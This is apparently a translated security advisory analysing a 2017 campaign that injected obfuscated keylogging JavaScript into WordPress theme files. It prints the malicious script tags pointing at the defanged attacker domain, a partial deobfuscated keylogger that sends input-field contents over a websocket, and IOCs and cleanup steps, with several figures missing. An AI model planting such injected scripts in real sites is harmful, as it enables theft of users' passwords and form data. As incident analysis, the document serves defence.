wordpress keylogger event analysis

Posted by millikan at 2020-04-02

2017-12-08 18:34

0x00 event background

Catalin cimpanu has found several attacks against WordPress sites, mainly by loading malicious scripts for keyboard recording, mining or mounting ads. And there is evidence that the attacks have been active since April. 360cert is very concerned about this incident.

0x01 event description

The reason is that WordPress is injected with a confused JS script, which is embedded from the function.php file of the topic. The address of the loaded JS script is:

<script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js'></script> <script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js'></script>

Reconnecting-websocket.js is used as websocket communication, and cors.js includes back door. Cors.js changes the front-end page, releases the JavaScript script for input listening, and then sends the data to the attacker (WSS: / / cloudflare [.] solutions: 8085 /).


0x02 attack script analysis

There are two JS at the bottom of the user's WordPress homepage. The first one is used for websocket communication. The back door core file is http: / / cloudflare [.] solutions / Ajax / LIBS / CORS / cors.js. Among them, cors.js is confused. After simple processing, the attack script is obtained:


The attack script will first call linter (), which decodes linterkey1 and linterkey2.[.............................]

The domain name does not exist. According to the code logic, the useful part should be? Later:


function process_event(event) { var result = JSON.stringify({ , element:}); socket.send(result); } var i_fields = document.getElementsByTagName('input'); for(var i=0; i < i_fields.length; i++) { i_fields[i].addEventListener('blur',process_event); }

The logic is well understood. Listen for blur events (input box loses focus) and send user input content through websocket.

Finally, after the window is loaded, execute addyandexmatrix(). This function is a JS similar to cnzz for access statistics. Specific usage:


0x03 attack impact

To view cloudflare [.] solutions DNS request records:


As you can see, there was a peak in June. And in the near future, the attack trend has risen sharply. Here is the record of requests as of today's writing:

As you can see, today, the attack has intensified.

Searching the page, we found that nearly 5000 sites around the world were infected:

Some of the following infected domain names:

0x04 mitigation measures

Check whether there is a JS request to cloudflare [.] solutions in the page source code, and carry out self inspection in this way.


Malicious JS is implanted through the function.php file of wordpress theme. Please delete the part of the file where the page renders malicious JS immediately. At this time, the password is likely to have been stolen. Please change the password in time.

0x05 IOCs

Resource request:



hxxp http://cloudflare[.]solutions/ajax/libs/cors/cors.js


Data reception:



0x06 timeline

Disclosure of Catalin cimpanu event on December 7, 2017

On December 8, 2017, 360cert timely followed up and issued an early warning

0x07 reference